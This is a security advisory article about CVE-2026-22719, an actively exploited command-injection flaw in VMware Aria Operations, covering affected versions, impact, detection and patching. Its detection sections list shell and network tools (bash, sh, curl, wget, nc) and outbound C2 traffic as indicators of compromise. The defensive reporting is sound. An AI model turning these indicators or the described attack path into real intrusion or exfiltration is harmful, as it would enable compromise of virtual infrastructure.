CISA KEV Alert: Actively Exploited VMware Aria Flaw (CVE-2026-22719) Allows Remote Code Execution
CISA Adds Actively Exploited VMware Aria Operations Vulnerability (CVE-2026-22719) to KEV Catalog
CVE Identifiers
Full Report
Executive Summary
On March 3, 2026, the U.S. CISA added CVE-2026-22719, a high-severity vulnerability in VMware Aria Operations, to its Known Exploited Vulnerabilities (KEV) catalog. This indicates confirmed, active exploitation of the flaw in the wild. The vulnerability is a command injection issue that can be exploited by an unauthenticated, remote attacker to execute arbitrary commands with root privileges. Although exploitation requires a specific condition—a product migration must be in progress—the lack of authentication and high potential impact make it a significant threat. Broadcom, VMware's parent company, has released patches and a workaround, and administrators are strongly urged to take immediate action.
Vulnerability Details
CVE-2026-22719 is a command injection vulnerability with a CVSS v3 score of 8.1. It exists in the logic that handles product migrations. An unauthenticated attacker on the same network segment as the target appliance can send a malicious request that injects and executes arbitrary commands. A successful exploit grants the attacker root-level access to the Aria Operations appliance.
A key prerequisite for exploitation is that a support-assisted product migration must be underway. While this narrows the window of opportunity, the fact that it is being exploited in the wild suggests attackers have found ways to either trigger this condition or identify targets already in this state.
Affected Systems
The vulnerability affects the following products:
- VMware Aria Operations (versions prior to 8.18.6)
- VMware Cloud Foundation (versions prior to 9.0.2.0)
- VMware vSphere Foundation (versions prior to 9.0.2.0)
Exploitation Status
Broadcom first disclosed the vulnerability on February 24, 2026. On March 3, CISA added it to the KEV catalog, providing official confirmation of active, in-the-wild exploitation. Details of the attacks are not public, but the KEV listing obligates U.S. federal agencies to patch the flaw by a specific deadline and serves as a strong warning to all organizations.
Impact Assessment
Compromising a VMware Aria Operations appliance provides an attacker with a powerful foothold inside a victim's network. Aria Operations is deeply integrated with the vSphere environment, giving it visibility and control over the entire virtual infrastructure. An attacker with root access to this appliance could potentially:
- Steal credentials for vCenter, ESXi hosts, and other systems.
- Gain a comprehensive understanding of the network topology and virtual machine inventory.
- Pivot to other systems within the virtual environment.
- Deploy ransomware or exfiltrate sensitive data from virtual machines.
Cyber Observables for Detection
To hunt for potential exploitation, security teams should focus on:
| Type | Value | Description |
|---|---|---|
log_source |
Aria Operations appliance logs |
Monitor for logs related to migration activities that coincide with anomalous command execution or network connections. |
process_name |
bash, sh, curl, wget |
Look for unexpected shell processes or network utility tools being executed by the Aria Operations service account. |
network_traffic_pattern |
Unusual outbound traffic from Aria appliance |
Monitor for connections to unknown or malicious IP addresses, which could indicate C2 communication or data exfiltration. |
Detection Methods
- Version Scanning: Identify all instances of VMware Aria Operations and related products in your environment and check their versions against the patched versions.
- Log Analysis: Scrutinize appliance system logs and application logs for any errors or unusual entries related to the migration service. Correlate these with network logs to identify suspicious inbound connections during the same timeframe. This applies D3FEND's
Process Analysis (D3-PA). - Integrity Monitoring: Monitor for unexpected changes to critical system files or configurations on the Aria Operations appliance.
Remediation Steps
- Apply Updates: The primary remediation is to update to a patched version of the affected software (e.g., VMware Aria Operations 8.18.6 or newer). This is a direct implementation of
M1051 - Update Software. - Use Workaround: If immediate patching is not feasible, Broadcom has provided a workaround script. This script should be obtained directly from the official VMware support site and applied according to their instructions.
- Network Controls: Restrict network access to the Aria Operations appliance. Ensure it is not exposed to the internet and is only accessible from trusted management segments of the network, as recommended by
M1035 - Limit Access to Resource Over Network.
Timeline of Events
MITRE ATT&CK Mitigations
Update Software
The primary mitigation is to apply the security updates provided by Broadcom/VMware.
Mapped D3FEND Techniques:
Restrict network access to the VMware Aria Operations appliance from untrusted networks to reduce the attack surface.
Mapped D3FEND Techniques:
D3FEND Defensive Countermeasures
Given that CVE-2026-22719 is confirmed to be actively exploited, the most urgent and effective defensive action is to apply the software updates provided by Broadcom. Organizations should immediately identify all instances of VMware Aria Operations, VMware Cloud Foundation, and VMware vSphere Foundation in their environments and upgrade them to the patched versions (e.g., Aria Operations 8.18.6+). Due to the KEV status, this should be treated as an emergency change. For organizations unable to patch immediately, applying the official workaround script from VMware is a critical compensating control, but should be considered a temporary measure until the full update can be deployed. This action directly closes the vulnerability, preventing attackers from using this specific vector for command injection.
To detect potential exploitation of CVE-2026-22719 or similar command injection flaws, security teams should implement robust process analysis on their VMware Aria Operations appliances. This involves establishing a baseline of normal running processes and their parent-child relationships. An EDR agent or a host-based intrusion detection system (HIDS) should be configured to monitor for anomalous process creation events. Specifically, look for the main Aria Operations service process spawning unexpected shells like sh, bash, or command-line utilities such as curl, wget, nc. Since the exploit grants root privileges, any such activity from the service's user context is highly suspicious. Correlating these process events with network logs showing unusual outbound connections from the appliance can provide high-fidelity alerts indicative of a successful compromise.
Sources & References
Article Author
Jason Gomes
• Cybersecurity PractitionerCybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.
Tags
📢 Share This Article
Help others stay informed about cybersecurity threats